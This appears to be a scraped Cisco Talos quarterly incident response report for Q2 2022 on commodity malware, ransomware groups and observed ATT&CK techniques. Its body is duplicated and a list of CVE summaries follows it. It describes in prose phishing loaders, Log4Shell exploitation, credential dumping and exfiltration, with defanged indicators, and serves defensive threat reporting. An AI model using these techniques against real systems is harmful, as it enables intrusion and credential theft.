Headline
Quarterly Report: Incident Response Trends in Q2 2022
Commodity malware usage surpasses ransomware by narrow margin
By Caitlin Huey.
For the first time in more than a year, ransomware was not the top threat Cisco Talos Incident Response (CTIR) responded to this quarter, as commodity malware surpassed ransomware by a narrow margin. This is likely due to several factors, including the closure of several ransomware groups, whether it be of their own volition or the actions of global law enforcement agencies and governments.
Commodity malware was the top observed threat this quarter, a notable development given the general decrease in observations of attacks leveraging commodity trojans in CTIR engagements since 2020. These developments coincide with a general resurgence of certain email-based trojans in recent months, as law enforcement and technology companies have continued to attempt to disrupt and affect email-based malware threats like Emotet and Trickbot. This quarter featured malware such as the Remcos remote access trojan (RAT), Vidar infostealer, Redline Stealer and Qakbot (Qbot), a well-known banking trojan that in recent weeks, has been observed in new clusters of activity delivering a variety of payloads.
Targeting
The top-targeted vertical continues to be telecommunications, following a trend where it was among the top targeted verticals in Q4 2021 and Q1 2022, closely followed by organizations in the education and health care sectors.
Commodity malware
This quarter saw a notable increase in commodity malware threats compared to previous quarters. Commodity malware is widely available for purchase or free download, is typically not customized and is used by a variety of threat actors in various stages of their operations and/or to deliver additional threats, including many of the ransomware variants referenced below.
In one engagement affecting a U.S. medical facility, CTIR identified a malicious Microsoft Excel file (XLS) disseminated via phishing emails delivering a variant of the Remcos RAT. Active since at least 2016, Remcos records keyboard and audio inputs, captures screenshots, gathers clipboard data and much more. CTIR identified remote network connections using a systems administrator account just prior to the suspected timeframe. The aforementioned XLS contains Visual Basic code which will execute once a user opens the file and enables macros. We identified an IP address, 209.127.19[.]101, within a PowerShell command that would eventually download the next stages of the infection from URLs hosted on that IP. In March 2022, this same IP address was also reported as associated with a Remcos RAT phishing campaign, suggesting CTIR was seeing an extension of this activity using lures to entice users to open a malicious XLS file that allegedly contains confidential information.
In recent weeks, Talos observed ongoing Qakbot activity leveraging thread hijacking, a method by which threat actors use compromised email accounts to insert malicious replies into the middle of an existing email conversation. In an engagement affecting a U.S. local government, CTIR investigated three waves of phishing emails that, upon user execution, subsequently delivered the Qakbot banking trojan. All three waves of emails were constructed in two different ways: Purely spoofed content using fake emails related to tax documents and a blend of thread hijacking leveraging spoofed and legitimate email body content designed to appear to be a reply to an ongoing email conversation. CTIR noted that the legitimate content appeared to primarily harvested from emails sent to external recipients in 2020 and 2021, which we’ll discuss in a forthcoming post. The legitimate content was partially scrubbed to remove certain email addresses within the text of the previous email messages, although at this time, the reason for this is unknown. While investigating the affected system, once the user clicked on the malicious link, a ZIP file was downloaded to the following directory, “C:/Users/<user>/Downloads”. The ZIP contained a Windows shortcut (LNK) file where the contents included a command intended to create a directory under the user profile and attempt to contact a C2 domain (bottlenuts[.]com) to retrieve a file and execute it using the Windows utility “regsvr32.exe”. While the Qakbot payload was not executed by the end user, the command line arguments and C2 domain are consistent with a recent publicly reported Qakbot campaign, suggesting that this is part of the same activity.
CTIR observed several information stealers this quarter, where in both incidents, MFA was not properly applied across the organization and their third parties. In one engagement, CTIR identified the Vidar information stealer affecting a telecommunications company based in the Philippines. First identified in 2018, Vidar is typically installed through spam emails and adware and potentially unwanted programs (PUPs). In this case, CTIR could not determine the initial access vector due to a lack of logging. However, the affected organization reported that the compromised victim did not have proper MFA applied.
In a similar series of events, in a Redline Stealer engagement, CTIR investigated widespread adversary MFA authentication accessing the victim’s O365, Workday and Citrix VDI environments. Adversary authentication followed two successful phishing attacks designed to collect usernames, passwords and up to two hashed one-time passcodes (HOTPs). First discovered in 2020, the Redline Stealer is sold on Russian language forums and messaging platforms such as Telegram and has become increasingly popular in its role as a primary and/or secondary payload supplementing activity associated with other malware.
Ransomware
Ransomware continued to be a top threat affecting Cisco customers. Of the ransomware engagements CTIR supported, this quarter featured previously seen high-profile ransomware-as-a-service (RaaS) variants, such as BlackCat (aka ALPHV) and Conti.
In a BlackCat ransomware engagement affecting a U.S. telecommunications organization, the ransomware was effectively blocked and did not execute in the environment. However, through the course of the incident, CTIR analyzed artifacts determined to be instances of Cobalt Strike with a Delphi loader capable of performing Mimikatz memory-dumping operations. CTIR observed two malicious domains that redirected to known Cobalt Strike IP addresses. Notably, one of the domains, standwithukraine[.]space, appears to be a reference to the ongoing Russia-Ukraine war. CTIR also detected numerous file downloads for Impacket’s Secretsdump module (“secretsdump.exe”) that performs various techniques to harvest credentials. While the appearance of the Delphi loader is not novel, BlackCat joins other ransomware groups, including REvil/Sodinokibi that have been reported leveraging the Delphi loader to run a Cobalt Strike binary.
In a Conti ransomware incident affecting a health care organization with locations across the U.S., Europe and the Middle East, CTIR observed a Conti affiliate exploiting Log4Shell (CVE-2021-44228, CVE-2021-45046, and related vulnerabilities) on a vulnerable VMware Horizon server, consistent with public reporting on Conti leveraging Log4Shell from December 2021. After establishing initial access, CTIR observed Cobalt Strike beaconing, system enumeration and unauthorized installation of remote access tools such as AnyDesk. The adversary then established persistence with the unauthorized creation of a local admin account and attempted to escalate privileges by modifying security-enabled group settings, service installation, disabling user accounts, accessing Windows Vault credentials, and resetting user passwords. For lateral movement, the adversary connected to IPC$ network shares and accessed a compromised host via remote desktop protocol (RDP). As discussed in the previous quarter, Conti is among the many threat actor groups leveraging Log4Shell as a means of initial infection, and we will likely continue to see threat actors adopting this exploit into their tactics, techniques and procedures (TTPs).
Interestingly, in May 2022, Conti first announced it was ceasing operations, and by June had taken much of its infrastructure offline, including Tor servers used to leak data and negotiate ransom payments with victims. As the effects of Conti shutting down are still unknown at this time, a relatively new RaaS variant dubbed “Black Basta’’ is a suspected re-brand of Conti, based on similarities in payment and leak sites and communication styles from some of its members. Black Basta, while unseen in incident response engagements thus far, began operating in mid-April 2022 and is gaining notoriety by leveraging the aforementioned Qakbot banking trojan to move laterally on compromised devices.
Initial vectors
This quarter also featured several engagements where adversaries identified and/or exploited misconfigured public-facing applications. This includes active scanning, exploitation of public-facing routers and servers, and leveraging Log4Shell in vulnerable applications, such as VMware Horizon.
In one engagement, an IT company with operations in Europe had a misconfigured and accidentally exposed Azure server. An adversary had attempted to remotely access the system before it was isolated. The system was alone in its subnet but connected to other internal resources via an IPSec VPN tunnel, a common VPN protocol used to establish a VPN connection. Analysis identified multiple failed login and brute force attempts from various external IP addresses, highlighting the need to update and limit exposure to prevent unwanted traffic from reaching the application.
Security weaknesses
The lack of MFA remains one of the biggest impediments to enterprise security. In at least two engagements this quarter, the affected organization’s partner or third party did not have MFA enabled, allowing the adversary to gain access and authenticate into the environment. CTIR recommends that organizations ensure all third parties in the environment are following MFA security policies and guidelines.
In the Remcos RAT engagement, CTIR identified that domain users had local administrator rights across the environment. This makes it easier for an adversary to exploit Active Directory and move laterally around the network.
Top-observed MITRE ATT&CK techniques
Below is a list of the MITRE ATT&CK techniques observed in this quarter’s IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. The table below represents the techniques used with a relevant example, and the approximate number of times seen. However, it is not an exhaustive list.
Key findings from the MITRE ATT&CK appendix include:
Adversaries leveraged valid accounts, achieved via techniques such as brute force, for initial access and persistence in several engagements this quarter. In line with last quarter, we continue to observe email-based threats leveraging a variety of social engineering techniques to entice users to click or execute a given link or file. We continue to see a variety of threats identify or exploit misconfigured or unpatched and vulnerable public-facing applications. Attackers use multiple techniques associated with credential harvesting tools and utilities, such as Mimikatz and Impacket, to obtain account and password information. The observed collection techniques exhibited the actors’ interest in specific information, including collecting details from Active Directory to harvest credential information about domain members.
.tg {border-collapse:collapse;border-spacing:0;} .tg td{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{border-color:black;border-style:solid;border-width:1px;font-family:Arial, sans-serif;font-size:14px; font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-pad2{background-color:#26282a;border-color:#ffffff;color:#ffffff;font-size:18px;text-align:left;vertical-align:top} .tg .tg-ab2z{background-color:#26282a;border-color:#ffffff;color:#ffffff;font-size:18px;font-weight:bold;text-align:left; vertical-align:top} .tg .tg-kzft{background-color:#26282a;border-color:#ffffff;color:#ffffff;font-weight:bold;text-align:left;vertical-align:top} .tg .tg-size{background-color:#26282a;border-color:#ffffff;color:#ffffff;text-align:left;vertical-align:top}
Tactic Technique Example
Initial Access (TA0001) T1190 Exploit Public-Facing Application Attackers successfully exploited a vulnerable application that was publicly exposed to the Internet.
Reconnaissance (TA0043) T1592 Gather Victim Host Information Malicious file contains details about host
Persistence (TA0003) T1053 Scheduled Task/Job Scheduled tasks were created on a compromised server
Execution (TA0002) T1059.001 Command and Scripting Interpreter: PowerShell Executes PowerShell code to retrieve information about the client's Active Directory environment
Discovery (TA0007) T1087 Account Discovery Use a utility like ADRecon to enumerate information on users and groups
Credential Access (TA0006) T1003.001 OS Credential Dumping: LSASS Memory Use “lsass.exe” for stealing password hashes from memory
Privilege Escalation (TA0004) T1574.002 Hijack Execution Flow: DLL Side-Loading A malicious PowerShell script attempted to side-load a DLL into memory
Lateral Movement (TA0008) T1021.001 Remote Desktop Protocol Adversary made attempts to move laterally using Windows Remote Desktop
Defense Evasion (TA0005) T1027 Obfuscated Files or Information Use base64-encoded PowerShell scripts
Command and Control (TA0011) T1219 Remote Access Software Remote access tools found on the compromised system
Impact (TA0040) T1486 Data Encrypted for Impact Deploy Conti ransomware and encrypt critical systems
Exfiltration (TA0010) T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage Actor exfiltrated data to file sharing site mega[.]nz
Collection (TA0009) T1114.003 Email Collection: Email Forwarding Rule Adversary used a compromised account to create a new inbox rule to place emails in a folder
Software/Tool S0029 PsExec Adversary made use of PsExec for lateral movement
For the first time in more than a year, ransomware was not the top threat Cisco Talos Incident Response (CTIR) responded to this quarter, as commodity malware surpassed ransomware by a narrow margin. This is likely due to several factors, including the closure of several ransomware groups, whether it be of their own volition or the actions of global law enforcement agencies and governments.
Commodity malware was the top observed threat this quarter, a notable development given the general decrease in observations of attacks leveraging commodity trojans in CTIR engagements since 2020. These developments coincide with a general resurgence of certain email-based trojans in recent months, as law enforcement and technology companies have continued to attempt to disrupt and affect email-based malware threats like Emotet and Trickbot. This quarter featured malware such as the Remcos remote access trojan (RAT), Vidar infostealer, Redline Stealer and Qakbot (Qbot), a well-known banking trojan that in recent weeks, has been observed in new clusters of activity delivering a variety of payloads.
Targeting
The top-targeted vertical continues to be telecommunications, following a trend where it was among the top targeted verticals in Q4 2021 and Q1 2022, closely followed by organizations in the education and health care sectors.
Commodity malware
This quarter saw a notable increase in commodity malware threats compared to previous quarters. Commodity malware is widely available for purchase or free download, is typically not customized and is used by a variety of threat actors in various stages of their operations and/or to deliver additional threats, including many of the ransomware variants referenced below.
In one engagement affecting a U.S. medical facility, CTIR identified a malicious Microsoft Excel file (XLS) disseminated via phishing emails delivering a variant of the Remcos RAT. Active since at least 2016, Remcos records keyboard and audio inputs, captures screenshots, gathers clipboard data and much more. CTIR identified remote network connections using a systems administrator account just prior to the suspected timeframe. The aforementioned XLS contains Visual Basic code which will execute once a user opens the file and enables macros. We identified an IP address, 209.127.19[.]101, within a PowerShell command that would eventually download the next stages of the infection from URLs hosted on that IP. In March 2022, this same IP address was also reported as associated with a Remcos RAT phishing campaign, suggesting CTIR was seeing an extension of this activity using lures to entice users to open a malicious XLS file that allegedly contains confidential information.
In recent weeks, Talos observed ongoing Qakbot activity leveraging thread hijacking, a method by which threat actors use compromised email accounts to insert malicious replies into the middle of an existing email conversation. In an engagement affecting a U.S. local government, CTIR investigated three waves of phishing emails that, upon user execution, subsequently delivered the Qakbot banking trojan. All three waves of emails were constructed in two different ways: Purely spoofed content using fake emails related to tax documents and a blend of thread hijacking leveraging spoofed and legitimate email body content designed to appear to be a reply to an ongoing email conversation. CTIR noted that the legitimate content appeared to primarily harvested from emails sent to external recipients in 2020 and 2021, which we’ll discuss in a forthcoming post. The legitimate content was partially scrubbed to remove certain email addresses within the text of the previous email messages, although at this time, the reason for this is unknown. While investigating the affected system, once the user clicked on the malicious link, a ZIP file was downloaded to the following directory, “C:/Users/<user>/Downloads”. The ZIP contained a Windows shortcut (LNK) file where the contents included a command intended to create a directory under the user profile and attempt to contact a C2 domain (bottlenuts[.]com) to retrieve a file and execute it using the Windows utility “regsvr32.exe”. While the Qakbot payload was not executed by the end user, the command line arguments and C2 domain are consistent with a recent publicly reported Qakbot campaign, suggesting that this is part of the same activity.
CTIR observed several information stealers this quarter, where in both incidents, MFA was not properly applied across the organization and their third parties. In one engagement, CTIR identified the Vidar information stealer affecting a telecommunications company based in the Philippines. First identified in 2018, Vidar is typically installed through spam emails and adware and potentially unwanted programs (PUPs). In this case, CTIR could not determine the initial access vector due to a lack of logging. However, the affected organization reported that the compromised victim did not have proper MFA applied.
In a similar series of events, in a Redline Stealer engagement, CTIR investigated widespread adversary MFA authentication accessing the victim’s O365, Workday and Citrix VDI environments. Adversary authentication followed two successful phishing attacks designed to collect usernames, passwords and up to two hashed one-time passcodes (HOTPs). First discovered in 2020, the Redline Stealer is sold on Russian language forums and messaging platforms such as Telegram and has become increasingly popular in its role as a primary and/or secondary payload supplementing activity associated with other malware.
**Ransomware **
Ransomware continued to be a top threat affecting Cisco customers. Of the ransomware engagements CTIR supported, this quarter featured previously seen high-profile ransomware-as-a-service (RaaS) variants, such as BlackCat (aka ALPHV) and Conti.
In a BlackCat ransomware engagement affecting a U.S. telecommunications organization, the ransomware was effectively blocked and did not execute in the environment. However, through the course of the incident, CTIR analyzed artifacts determined to be instances of Cobalt Strike with a Delphi loader capable of performing Mimikatz memory-dumping operations. CTIR observed two malicious domains that redirected to known Cobalt Strike IP addresses. Notably, one of the domains, standwithukraine[.]space, appears to be a reference to the ongoing Russia-Ukraine war. CTIR also detected numerous file downloads for Impacket’s Secretsdump module (“secretsdump.exe”) that performs various techniques to harvest credentials. While the appearance of the Delphi loader is not novel, BlackCat joins other ransomware groups, including REvil/Sodinokibi that have been reported leveraging the Delphi loader to run a Cobalt Strike binary.
In a Conti ransomware incident affecting a health care organization with locations across the U.S., Europe and the Middle East, CTIR observed a Conti affiliate exploiting Log4Shell (CVE-2021-44228, CVE-2021-45046, and related vulnerabilities) on a vulnerable VMware Horizon server, consistent with public reporting on Conti leveraging Log4Shell from December 2021. After establishing initial access, CTIR observed Cobalt Strike beaconing, system enumeration and unauthorized installation of remote access tools such as AnyDesk. The adversary then established persistence with the unauthorized creation of a local admin account and attempted to escalate privileges by modifying security-enabled group settings, service installation, disabling user accounts, accessing Windows Vault credentials, and resetting user passwords. For lateral movement, the adversary connected to IPC$ network shares and accessed a compromised host via remote desktop protocol (RDP). As discussed in the previous quarter, Conti is among the many threat actor groups leveraging Log4Shell as a means of initial infection, and we will likely continue to see threat actors adopting this exploit into their tactics, techniques and procedures (TTPs).
Interestingly, in May 2022, Conti first announced it was ceasing operations, and by June had taken much of its infrastructure offline, including Tor servers used to leak data and negotiate ransom payments with victims. As the effects of Conti shutting down are still unknown at this time, a relatively new RaaS variant dubbed “Black Basta’’ is a suspected re-brand of Conti, based on similarities in payment and leak sites and communication styles from some of its members. Black Basta, while unseen in incident response engagements thus far, began operating in mid-April 2022 and is gaining notoriety by leveraging the aforementioned Qakbot banking trojan to move laterally on compromised devices.
Initial vectors
This quarter also featured several engagements where adversaries identified and/or exploited misconfigured public-facing applications. This includes active scanning, exploitation of public-facing routers and servers, and leveraging Log4Shell in vulnerable applications, such as VMware Horizon.
In one engagement, an IT company with operations in Europe had a misconfigured and accidentally exposed Azure server. An adversary had attempted to remotely access the system before it was isolated. The system was alone in its subnet but connected to other internal resources via an IPSec VPN tunnel, a common VPN protocol used to establish a VPN connection. Analysis identified multiple failed login and brute force attempts from various external IP addresses, highlighting the need to update and limit exposure to prevent unwanted traffic from reaching the application.
**
Security weaknesses**
The lack of MFA remains one of the biggest impediments to enterprise security. In at least two engagements this quarter, the affected organization’s partner or third party did not have MFA enabled, allowing the adversary to gain access and authenticate into the environment. CTIR recommends that organizations ensure all third parties in the environment are following MFA security policies and guidelines.
In the Remcos RAT engagement, CTIR identified that domain users had local administrator rights across the environment. This makes it easier for an adversary to exploit Active Directory and move laterally around the network.
Top-observed MITRE ATT&CK techniques
Below is a list of the MITRE ATT&CK techniques observed in this quarter’s IR engagements. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic in which they were leveraged. The table below represents the techniques used with a relevant example, and the approximate number of times seen. However, it is not an exhaustive list.
Key findings from the MITRE ATT&CK appendix include:
- Adversaries leveraged valid accounts, achieved via techniques such as brute force, for initial access and persistence in several engagements this quarter.
- In line with last quarter, we continue to observe email-based threats leveraging a variety of social engineering techniques to entice users to click or execute a given link or file.
- We continue to see a variety of threats identify or exploit misconfigured or unpatched and vulnerable public-facing applications.
- Attackers use multiple techniques associated with credential harvesting tools and utilities, such as Mimikatz and Impacket, to obtain account and password information. The observed collection techniques exhibited the actors’ interest in specific information, including collecting details from Active Directory to harvest credential information about domain members.
Related news
Red Hat uses a four-point impact scale to classify security issues affecting our products. Have you ever asked yourself what it takes and what the requirements are for each point of the scale? We will talk through the highlights of our process in this article.Is this a CVE?First and foremost, what is a CVE? Short for Common Vulnerabilities and Exposures, it is a list of publicly disclosed computer security flaws. Learn more in this Red Hat post.To receive a severity rating, the issue needs to be a CVE. But what does it take to be a CVE? In order to warrant a CVE ID, a vulnerability has to comp
Docker Desktop before 4.23.0 allows Access Token theft via a crafted extension icon URL. This issue affects Docker Desktop: before 4.23.0.
A four-year-old critical security flaw impacting Fortinet FortiOS SSL has emerged as one of the most routinely and frequently exploited vulnerabilities in 2022. "In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems," cybersecurity and intelligence agencies from the Five
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three flaws to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The security vulnerabilities are as follows - CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability CVE-2021-45046 (CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted
Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. An attacker with privileges same as a legitimate user can phish the legitimate the user to redirect to malicious website leading to information disclosure and launch of phishing attacks.
CISA, FBI, and South Korean intelligence agencies warn that the North Korean government is sponsoring ransomware attacks to fund its cyber-espionage activities.
SQL Injection vulnerability in Talend ESB Runtime 7.3.1-R2022-09-RT thru 8.0.1-R2022-10-RT when using the provisioning service.
An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Sling App CMS version 1.1.2 and prior may allow an authenticated remote attacker to perform a reflected cross-site scripting (XSS) attack in the site group feature. Upgrade to Apache Sling App CMS >= 1.1.4
Canon Medical Informatics Vitrea Vision 7.7.76.1 does not adequately enforce access controls. An authenticated user is able to gain unauthorized access to imaging records by tampering with the vitrea-view/studies/search patientId parameter.
Though there have been fewer than expected publicly reported attacks involving the vulnerability, nearly three-quarters of organizations remain exposed to it.
Frauscher Sensortechnik GmbH FDS102 for FAdC R2 and FAdCi R2 v2.8.0 to v2.9.1 are vulnerable to malicious code upload without authentication by using the configuration upload function. This could lead to a complete compromise of the FDS102 device.
Ransomware and pre-ransomware engagements make up 40 percent of threats seen this quarter By Caitlin Huey. For the first time since compiling these reports, Cisco Talos Incident Response saw an equal number of ransomware and pre-ransomware engagements, making up nearly 40 percent of threats this quarter. It can be difficult to determine what constitutes a pre-ransomware attack if ransomware never executes and encryption does not take place. However, Talos IR assesses that the combination of Cobalt Strike and credential-harvesting tools like Mimikatz, paired with enumeration and discovery techniques, indicates a high likelihood that ransomware is the final objective. This quarter featured a variety of publicly available tools and scripts hosted on GitHub repositories or other third-party websites to support operations across multiple stages of the attack lifecycle. This activity coincides with a general increase in the use of other dual-use tools, such as the legitimate red-teaming ...
Hello everyone! This episode will be about the new hot twenty vulnerabilities from CISA, NSA and FBI, Joint cybersecurity advisory (CSA) AA22-279A, and how I analyzed these vulnerabilities using my open source project Vulristics. Alternative video link (for Russia): https://vk.com/video-149273431_456239105 Americans can’t just release a list of “20 vulnerabilities most commonly exploited in attacks on […]
Categories: Exploits and vulnerabilities Categories: News Tags: Chinese APT Tags: advanced persistent threat Tags: APT Tags: CISA Tags: NSA Tags: FBI Tags: security advisory CISA, the NSA and the FBI have compiled a list of the vulnerabilities targeted by state-sponsorted threat actors from China. (Read more...) The post Chinese APT's favorite vulnerabilities revealed appeared first on Malwarebytes Labs.
A security vulnerability has been identified in Apache Kafka. It affects all releases since 2.8.0. The vulnerability allows malicious unauthenticated clients to allocate large amounts of memory on brokers. This can lead to brokers hitting OutOfMemoryException and causing denial of service. Example scenarios: - Kafka cluster without authentication: Any clients able to establish a network connection to a broker can trigger the issue. - Kafka cluster with SASL authentication: Any clients able to establish a network connection to a broker, without the need for valid SASL credentials, can trigger the issue. - Kafka cluster with TLS authentication: Only clients able to successfully authenticate via TLS can trigger the issue. We advise the users to upgrade the Kafka installations to one of the 3.2.3, 3.1.2, 3.0.2, 2.8.2 versions.
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Wednesday announced sweeping sanctions against ten individuals and two entities backed by Iran's Islamic Revolutionary Guard Corps (IRGC) for their involvement in ransomware attacks at least since October 2020. The agency said the cyber activity mounted by the individuals is partially attributable to intrusion sets tracked
Insufficient access control vulnerability was discovered in the Crestron AirMedia Windows Application, version 4.3.1.39, in which a user can pause the uninstallation of an executable to gain a SYSTEM level command prompt.
A slew of Microsoft Exchange vulnerabilities (including ProxyLogon) fueled a surge in attacks targeting software flaws in 2021, but the trend has continued this year.
PrinterLogic Windows Client through 25.0.0.676 allows attackers to execute directory traversal. Authenticated users with prior knowledge of the driver filename could exploit this to escalate privileges or distribute malicious content.
Directory Traversal vulnerability ZDBQAREFSUBDIR parameter in /zropusermgmt API in Zoho ManageEngine Analytics Plus before 4350 allows remote attackers to run arbitrary code.
MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the tomcat user. This Metasploit module will start an LDAP server that the target will need to connect to.
Open-Xchange App Suite versions 7.10.6 and below suffer from OS command injection and cross site scripting vulnerabilities. One particular cross site scripting issue only affects versions 7.10.5 and below.
Vulnerability will remain a "significant" threat for years to come and highlighted the need for more public and private sector support for open source software ecosystem, Cyber Safety Review Board says.
What are container image vulnerabilities?
Pure Storage FlashArray products running Purity//FA 6.2.0 - 6.2.3, 6.1.0 - 6.1.12, 6.0.0 - 6.0.8, 5.3.0 - 5.3.17, 5.2.x and prior Purity//FA releases, and Pure Storage FlashBlade products running Purity//FB 3.3.0, 3.2.0 - 3.2.4, 3.1.0 - 3.1.12, 3.0.x and prior Purity//FB releases are vulnerable to a privilege escalation via the manipulation of Python environment variables which can be exploited by a logged-in user to escape a restricted shell to an unrestricted shell with root privileges. No other Pure Storage products or services are affected. Remediation is available from Pure Storage via a self-serve “opt-in” patch, manual patch application or a software upgrade to an unaffected version of Purity software.
By Flavio Costa, Chris Neal and Guilherme Venere. In a recent customer engagement, we observed a month-long AvosLocker campaign. The attackers utilized several different tools, including Cobalt Strike, Sliver and multiple commercial network scanners. The initial ingress point in this incident was... [[ This is only the beginning! Please visit the blog for the complete entry ]]
In this post, we break down 5 times hackers used security vulnerabilities in 2021 to attack governments and businesses. The post Security vulnerabilities: 5 times that organizations got hacked appeared first on Malwarebytes Labs.
Versions of the Amazon AWS Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.3.5 are affected by a race condition that could lead to a local privilege escalation. This Hotpatch package is not a replacement for updating to a log4j version that mitigates CVE-2021-44228 or CVE-2021-45046; it provides a temporary mitigation to CVE-2021-44228 by hotpatching the local Java virtual machines. To do so, it iterates through all running Java processes, performs several checks, and executes the Java virtual machine with the same permissions and capabilities as the running process to load the hotpatch. A local user could cause the hotpatch script to execute a binary with elevated privileges by running a custom java process that performs exec() of an SUID binary after the hotpatch has observed the process path and before it has observed its effective user ID.
Versions of the Amazon AWS Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.3.5 are affected by a race condition that could lead to a local privilege escalation. This Hotpatch package is not a replacement for updating to a log4j version that mitigates CVE-2021-44228 or CVE-2021-45046; it provides a temporary mitigation to CVE-2021-44228 by hotpatching the local Java virtual machines. To do so, it iterates through all running Java processes, performs several checks, and executes the Java virtual machine with the same permissions and capabilities as the running process to load the hotpatch. A local user could cause the hotpatch script to execute a binary with elevated privileges by running a custom java process that performs exec() of an SUID binary after the hotpatch has observed the process path and before it has observed its effective user ID.
An infinite loop in OPC UA .NET Standard Stack 1.04.368 allows a remote attackers to cause the application to hang via a crafted message.
A Denial of Service flaw was discovered in Elasticsearch. Using this vulnerability, an unauthenticated attacker could forcibly shut down an Elasticsearch node with a specifically formatted network request.
EnemyBot DDoS botnet is rapidly weaponizing security bugs disclosed in CMS systems like WordPress plug-ins, Android devices, commercial Web servers, and other enterprise applications.
In Apache Archiva, any registered user can reset password for any users. This is fixed in Archiva 2.2.8
Calibre-Web before 0.6.18 allows user table SQL Injection.
Mitel 6800 and 6900 Series SIP phone devices through 2022-04-27 have "undocumented functionality." A vulnerability in Mitel 6800 Series and 6900 Series SIP phones excluding 6970, versions 5.1 SP8 (5.1.0.8016) and earlier, and 6.0 (6.0.0.368) through 6.1 HF4 (6.1.0.165), could allow a unauthenticated attacker with physical access to the phone to gain root access due to insufficient access control for test functionality during system startup. A successful exploit could allow access to sensitive information and code execution.
Mitel 6800 and 6900 Series SIP phone devices through 2022-04-27 have "undocumented functionality." A vulnerability in Mitel 6800 Series and 6900 Series SIP phones excluding 6970, versions 5.1 SP8 (5.1.0.8016) and earlier, and 6.0 (6.0.0.368) through 6.1 HF4 (6.1.0.165), could allow a unauthenticated attacker with physical access to the phone to gain root access due to insufficient access control for test functionality during system startup. A successful exploit could allow access to sensitive information and code execution.
Mitel 6800 and 6900 Series SIP phone devices through 2022-04-27 have "undocumented functionality." A vulnerability in Mitel 6800 Series and 6900 Series SIP phones excluding 6970, versions 5.1 SP8 (5.1.0.8016) and earlier, and 6.0 (6.0.0.368) through 6.1 HF4 (6.1.0.165), could allow a unauthenticated attacker with physical access to the phone to gain root access due to insufficient access control for test functionality during system startup. A successful exploit could allow access to sensitive information and code execution.
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.27 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in takeover of MySQL Connectors. CVSS 3.1 Base Score 6.6 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H).
An Improper Input Validation vulnerability in DataImportHandler of Apache Solr allows an attacker to provide a Windows UNC path resulting in an SMB network call being made from the Solr host to another host on the network. If the attacker has wider access to the network, this may lead to SMB attacks, which may result in: * The exfiltration of sensitive data such as OS user hashes (NTLM/LM hashes), * In case of misconfigured systems, SMB Relay Attacks which can lead to user impersonation on SMB Shares or, in a worse-case scenario, Remote Code Execution This issue affects all Apache Solr versions prior to 8.11.1. This issue only affects Windows.
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix this issue by removing support for message lookup patterns and disabling JNDI functionality by default.
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Improper Access Control vulnerability in web service of Secomea SiteManager allows local attacker without credentials to gather network information and configuration of the SiteManager. This issue affects: Secomea SiteManager All versions prior to 9.5 on Hardware.
Improper Access Control vulnerability in web service of Secomea SiteManager allows local attacker without credentials to gather network information and configuration of the SiteManager. This issue affects: Secomea SiteManager All versions prior to 9.5 on Hardware.
Multiple buffer overflows in Active Management Technology (AMT) in Intel Manageability Engine Firmware 8.x/9.x/10.x/11.0/11.5/11.6/11.7/11.10/11.20 allow attacker with local access to the system to execute arbitrary code with AMT execution privilege.
The code in Apache Tomcat 9.0.0.M1 to 9.0.0.M11, 8.5.0 to 8.5.6, 8.0.0.RC1 to 8.0.38, 7.0.0 to 7.0.72, and 6.0.0 to 6.0.47 that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own.